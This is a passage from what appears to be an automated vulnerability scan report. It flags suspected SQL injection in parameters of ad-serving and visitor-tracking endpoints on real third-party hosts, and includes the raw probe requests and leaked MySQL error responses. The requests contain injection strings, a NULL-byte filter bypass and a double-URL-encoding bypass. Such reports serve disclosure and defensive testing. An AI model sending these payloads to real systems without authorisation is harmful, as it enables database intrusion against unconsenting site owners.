'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUCuHqA1IVXQFhIjgDP1QN0ssCPz5nZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MjcxNzg0MTU_LGMsMzIxNjExLHBjLDc2Mjg5LGFjLDE1MTM1NCxvLE4wLVMwLGwsNTM5ODQscGNsaWNrLGh0dHA6Ly9hZC5hZnkxMS5uZXQvYWQ_Yz1QdnpCM3E1NHVVMjJ6N2lKcWdld1RqZ1RENHlKZjdtVVFrZVVGeFo3VWpmOGtWdWllTHpnZTlGalpnT0hmaTVsWENZbkIwYTVXamQxb1VtSUZDUXJjdjNnK0ZNR0w0dVRXSGtPQ2ZLMEExZz0hJjExMjg4MzkyOCcgb3IgMT0xLS0gPTEK&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=27178415?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=2115406896" s
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUTv4f.4AvYNPTpLkaenGPTHc02R4AAKsTJuN7gksypS.cOSoSGLwAAAEvZiQOFg--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:29 GMT; Path=/
Set-Cookie: UA=AAAAAQAUq2Z2XwOQwbbOy0ZJvKPLhf0xgaYDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FTwzIBgPf1fUglQwsIYwgCiwpDpECABl8Bzo-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2995
Date: Mon, 18 Apr 2011 01:05:29 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUu1LCr3inDmUp5YA3h7ihYNKcGZlnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MTczNDc5NzY0Nj8sYywzMjE2MTEscGMsNzYyODksYWMsMTUxMzU0LG8sTjAtUzAsbCw1Mzk4NCxwY2xpY2ssaHR0cDovL2FkLmFmeTExLm5ldC9hZD9jPVB2ekIzcTU0dVUyMno3aUpxZ2V3VGpnVEQ0eUpmN21VUWtlVUZ4WjdVamY4a1Z1aWVMemdlOUZqWmdPSGZpNWxYQ1luQjBhNVdqZDFvVW1JRkNRcmN2M2crRk1HTDR1VFdIa09DZkswQTFnPSEmMTEyODgzOTI4JyBvciAxPTItLSA9MQo-&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=1734797646?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=178
...[SNIP]...
1.2. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16'&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
L3hzcy1kb3JrLWNyb3NzLXNpdGUtc2NyaXB0aW5nLW1zbndoaXRlcGFnZXNjb20uaHRtbKgDAcgDF-gD3QXoA4oD6APiBegDugL1AwIAAMQ&num=2&sig=AGiWqtyvoRnT7_XBYCMbzl_kBgPSVrAlcA&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16''&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
1.3. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00'&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtyi1rn2uRrvPguh1q-agLK2-d5y9A&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00''&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.4. http://googleads.g.doubleclick.net/pagead/ads [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
4c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWwnqAMByAMX6APdBegDigPoA-IF6AO6AvUDAgAAxA&num=2&sig=AGiWqty8MXeYQZr7hKVhCpbj7a3Uah-E1Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.5. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/evtracker.php

Issue detail

The _evacct parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _evacct parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /evTracker/evtracker.php?_evacct=1'&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 299
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: select name from client where clientID='1''<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /evTracker/evtracker.php?_evacct=1''&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 0
Connection: close
Content-Type: text/html

1.6. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The edate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the edate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011'&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 536
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '23:59:59'
       AND `pathQuery` != ''' at line 6)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011''&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
